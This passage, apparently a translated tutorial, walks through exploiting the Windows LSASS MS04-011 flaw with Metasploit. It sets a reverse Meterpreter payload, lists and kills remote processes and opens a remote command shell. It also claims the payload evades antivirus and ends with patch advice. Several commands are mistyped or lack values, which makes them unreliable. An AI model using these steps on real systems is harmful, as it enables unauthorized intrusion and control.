msf> setg LHOST
3.1. Select module exploit:
Select the faulty program or service that Metasploit supports to exploit.
You should regularly update service errors on or via msfupdate.bat script
3.2. The exploit module configuration has been selected:
Some modules also have advanced options, which you can view by typing the show advanceds command
3.3. Confirm the configuration options:
3.4. Select target:
Select the operating system you want to perform.
For example:
smf> use windows_ssl_pct
show targets
Exploit will list the targets such as: winxp, winxp SP1, win2000, win2000 SP1
3.5. Select payload:
Payload is the code that will run on the remote computer system.
3.6. Execute exploit:
Meterpreter, short for Meta-Interpreter is an advanced payload included in the Metasploit framework. Its purpose is to provide scripts to exploit and attack remote computers. It is written from developers in the form of shared object (DLL) files. Meterpreter and extension components implemented in memory, are not written to disk, so detection from antivirus software can be avoided.
Meterpreter provides a script so we can exploit on remote computers:
Use the command:
Using Fs module: Allows uploading and downloading files from remote machines.
Use Net module:
Using Process module:
Using Sys module:
The localhost with address will attack the remote machine with the address through the error Lsass_ms04_011. This is a stack overflow error in LSA (Local Security Authority) service. Lsass.exe is a process of Microsoft Windows system, responsible for local security authentication, Active Directory management and login policies. Lsass controls both client and server authentication.
Msf> use Lsass_ms04_011
Msf> set PAYLOAD win32_reverse_meterpreter
Msf> set RHOST
Msf> set LHOST
Msf> Exploitation
Meterpreter> help
Meterpreter> use -m P // add the process script
Meterpreter> help
Meterpreter> ps // list of processes for which the remote machine is running
Meterpreter> kill // turn off processes for which the remote machine is running
Meterpreter> // attack using comandline cmd of remote machine
execute: success, process id is 3516.
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1 .
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C: WINDOWS> echo Meterpreter interactive channel in action
echo Meterpreter interactive channel in action
Meterpreter interactive channel in action
C: WINDOWS> ipconfig
Caught Ctrl-C, close interactive session? [y / N] y
Regularly update Microsoft patches. For example, if Metasploit cannot exploit Lsass_ms04_011 error, you must update the Microsoft patch. According to Microsoft, this is a serious error, available on almost all Windows operating systems. You should use the hotfix that has a number of 835732 to patch the above. and readers thank you:
Viking - (ENS Group) - Adminvietnam ( has cooperated to submit this article.
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